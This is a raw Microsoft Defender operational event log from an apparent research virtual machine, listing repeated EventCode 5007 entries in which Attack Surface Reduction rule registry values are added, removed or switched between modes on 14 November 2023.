Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=538 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=537 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=536 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=535 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=534 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=533 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=532 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=531 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=530 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 New value: 11/14/2023 10:20:23 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=529 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x0 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=528 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=527 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=526 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=525 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=524 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=523 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=522 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=521 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=520 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=519 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=518 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=517 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=516 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=515 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x2 11/14/2023 10:20:01 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=514 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x2 11/14/2023 10:17:44 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=513 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 New value: 11/14/2023 10:17:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=512 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x2 11/14/2023 10:17:43 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=511 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x2 11/14/2023 10:12:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=510 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 New value: 11/14/2023 10:12:41 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=509 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/14/2023 10:08:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=508 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 New value: 11/14/2023 10:08:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=507 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x2 11/14/2023 10:07:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=506 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 New value: 11/14/2023 10:07:53 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=505 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x2 11/14/2023 09:57:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=502 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: 11/14/2023 09:57:38 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=501 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x2 11/14/2023 09:44:45 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=500 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value: 11/14/2023 09:44:45 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=499 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 d1e49aac-8f56-4280-b9ba-993a6d77406c e6db77e5-3df2-4cf1-b95a-636979351e5b c1db55ab-c21a-4637-bb3f-a12568109d35 3B576869-A4EC-4529-8536-B80A7769E899 56a863a9-875e-4185-98a7-b882c64b5ce5 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 5BEB7EFE-FD9A-4556-801D-275E5FFC04CC 7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c 26190899-1602-49e8-8b27-eb1d0a1ce869 D4F940AB-401B-4EFC-AADC-AD5F3C50688A 75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 D3E037E1-3EB8-44C8-A917-57927947596D 92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=498 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value: 11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=497 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 11/14/2023 09:44:31 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=496 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 11/14/2023 09:41:42 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=495 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 11/14/2023 09:38:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=494 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value: 11/14/2023 09:38:30 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=493 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/14/2023 09:38:29 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=492 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x0 New value: 11/14/2023 09:38:29 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=491 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 11/14/2023 09:36:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=490 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x0 New value: 11/14/2023 09:36:00 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=489 Keywords=None TaskCategory=None 